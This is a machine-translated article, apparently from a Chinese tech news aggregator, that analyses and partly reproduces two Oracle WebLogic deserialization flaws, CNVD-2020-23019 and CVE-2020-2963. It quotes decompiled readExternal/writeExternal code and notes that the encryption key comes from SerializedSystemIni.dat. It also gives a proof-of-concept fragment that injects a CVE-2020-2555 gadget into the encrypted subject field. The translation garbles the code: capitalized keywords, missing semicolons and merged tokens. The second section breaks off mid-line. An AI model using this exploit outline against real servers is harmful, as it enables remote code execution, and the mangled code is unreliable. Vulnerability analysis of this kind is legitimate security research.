Shulou(Shulou.com)05/31 Report--

This article shows you how to carry out weblogic deserialization vulnerability analysis and reproduction, the content is concise and easy to understand, absolutely can make your eyes bright, through the detailed introduction of this article, I hope you can get something.

Brief introduction

Both holes should be patches updated in May and were accidentally discovered during the analysis. It's easy to take a look at the loophole, but it's a little harsh to use it.

SOAPInvokeState CNVD-2020-23019

Diff patch, screenshot as follows

It is obvious that you have changed ObjectInputStream to FilterInputStream. In weblogic, FilterInputStream is responsible for checking whether there is a Gadget available for deserialization classes, while ObjectInputStream does not. And in the readObject method of the class, the default parameter is deserialized to FilterInputStream by T3 protocol to defend against deserialization vulnerabilities.

There is no deserialization vulnerability unless ObjectInputStream is called indiscriminately in the readObject of the class.

In SOAPInvokeState's readExternal, we only need to be able to walk into the following process

If ((flags & 1)! = 0) {

Try {

Len = in.readInt ()

Byte [] bytes = new byte [len]

In.readFully (bytes)

Bytes = EncryptionUtil.decrypt (bytes)

ByteArrayInputStream bais = new ByteArrayInputStream (bytes)

ObjectInputStream in2 = new ObjectInputStream (bais)

This.subject = (AuthenticatedSubject) in2.readObject ()

} catch (Exception var13) {

(new NonCatalogLogger ("WebServices")) .warning ("Couldn't completely read SOAPInvokeState object", var13)

}

Take a look at the writeExternal method. If there is a subject in the instantiated class, you can have readExternal perform the above deserialization process

If (this.subject! = null) {

ByteArrayOutputStream var12 = new ByteArrayOutputStream ()

ObjectOutputStream var13 = new ObjectOutputStream (var12)

Var13.writeObject (this.subject)

Var13.flush ()

Byte [] var5 = var12.toByteArray ()

Var5 = EncryptionUtil.encrypt (var5)

Var1.writeInt (var5.length)

Var1.write (var5)

}

Of course, there are the following questions

Encrypt

When EncryptionUtil.encrypt is encrypted, it will be true according to Kernel.isServer () before it is encrypted, otherwise the original data will be returned. Therefore, before encryption, you need to call KernelStatus.setIsServer (true) to set the state to true, or force encryption.

Public static byte [] encrypt (byte [] var0) {

ReturngetEncryptionService () encryptBytes (var0)

}

In weblogic.security.internal.SerializedSystemIni#getExistingEncryptionService, SerializedSystemIni.dat is read as the key, that is, authentication or cooperation with file reading is required to exploit this vulnerability to attack weblogic

Public static EncryptionService getExistingEncryptionService () {

String var0 = DomainDir.getRootDir ()

String var1 = var0 + File.separator + "security" + File.separator + "SerializedSystemIni.dat"

File var2 = new File (var1)

If (! var2.exists ()) {

String var3 = var0 + File.separator + "SerializedSystemIni.dat"

File var4 = new File (var3)

If (! var4.exists ()) {

Returnnull

}

Var1 = var3

}

SerializedSystemIni var5 = new SerializedSystemIni (var1)

ReturngetEncryptionService (var5.getTheSalt (), var5.getTheEncryptedSecretKey (), var5.getTheAESEncryptedSecretKey ()); POC

Change writeExternal to the following code, and then deserialize it

BadAttributeValueExpException exp = null

Try {

Exp = cve_2020_2555.getBadAttributeValueExpException ()

} catch (Exception e) {

E.printStackTrace ()

}

Out2.writeObject (exp)

Out2.flush ()

Byte [] bytes = baos.toByteArray ()

Bytes = EncryptionUtil.encrypt (bytes)

Out.writeInt (bytes.length)

Out.write (bytes)

}

}

WlsSSLAdapter CVE-2020-2963

The principle is the same, as detailed in the following code

Private Object readEncryptedField (ObjectInputStream in) throws IOException, ClassNotFoundException {

Int length = in.readInt ()

If (length

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.